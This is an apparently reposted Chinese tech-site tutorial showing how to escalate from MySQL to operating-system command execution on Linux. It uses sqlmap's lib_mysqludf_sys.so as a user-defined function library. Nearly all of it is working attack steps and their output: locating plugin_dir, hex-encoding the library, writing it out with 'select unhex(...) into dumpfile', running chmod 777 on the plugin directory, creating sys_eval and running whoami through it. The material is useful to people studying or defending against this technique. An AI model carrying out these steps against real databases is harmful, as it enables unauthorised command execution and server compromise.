当前位置: 移动技术网 > IT编程>数据库>Mysql > Linux利用UDF库实现Mysql提权

Linux利用UDF库实现Mysql提权

2017年12月12日  | 移动技术网IT编程  | 我要评论

环境:
os:linux(bt5)
 
database:mysql
 
简述:
通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。
 
要求:
 在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,udf会被禁止;
 
过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令

1,得到插件库路径

mysql> show variables like "%plugin%";
+---------------+-----------------------+
| variable_name | value         |
+---------------+-----------------------+
| plugin_dir  | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)

2,找对应操作系统的udf库文件
因为自己测试,看了下自己系统的版本,64位
 

root@bt:~# uname -a
linux bt 3.2.6 #1 smp fri feb 17 10:34:20 est 2012 x86_64 gnu/linux

 
对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可

root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32 64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so

3,利用udf库文件加载函数并执行命令
首先要得到udf库文件的十六进制格式,可在本地通过
 

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
query ok, 1 row affected (0.04 sec)

 
因为我测试时,使用自带账户,账户名mysql,并不是root,所以插件目录不可写,而实际中,一般udf提权都是用root权限启动的mysql程序,故,不存在目录权限不足,不能访问的情况。为了继续,修改目录权限
 
:~# chmod 777 /usr/lib/mysql/plugin
 
数据库中写入udf库到mysql库目录:
 

mysql> select unhex('7f454c46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
query ok, 1 row affected (0.04 sec)

 
查看下这个udf库所支持的函数

root@bt:~# nm -d /usr/lib/mysql/plugin/mysqludf.so
         w _jv_registerclasses
0000000000201788 a __bss_start
         w __cxa_finalize
         w __gmon_start__
0000000000201788 a _edata
0000000000201798 a _end
0000000000001178 t _fini
0000000000000ba0 t _init
         u fgets
         u fork
         u free
         u getenv
000000000000101a t lib_mysqludf_sys_info
0000000000000da4 t lib_mysqludf_sys_info_deinit
0000000000001047 t lib_mysqludf_sys_info_init
         u malloc
         u mmap
         u pclose
         u popen
         u realloc
         u setenv
         u strcpy
         u strncpy
0000000000000dac t sys_bineval
0000000000000dab t sys_bineval_deinit
0000000000000da8 t sys_bineval_init
0000000000000e46 t sys_eval
0000000000000da7 t sys_eval_deinit
0000000000000f2e t sys_eval_init
0000000000001066 t sys_exec
0000000000000da6 t sys_exec_deinit
0000000000000f57 t sys_exec_init
00000000000010f7 t sys_get
0000000000000da5 t sys_get_deinit
0000000000000fea t sys_get_init
000000000000107a t sys_set
00000000000010e8 t sys_set_deinit
0000000000000f80 t sys_set_init
         u sysconf
         u system
         u waitpid

最后,加载函数并执行:

mysql> create function sys_eval returns string soname "mysqludf.so";
query ok, 0 rows affected (0.14 sec)
 
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql       |
+--------------------+
1 row in set (0.04 sec)
 
mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name   | ret | dl     | type   |
+----------+-----+-------------+----------+
| sys_eval |  0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set

您可能感兴趣的文章:

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
最近更新的文章
大家感兴趣的文章
移动技术网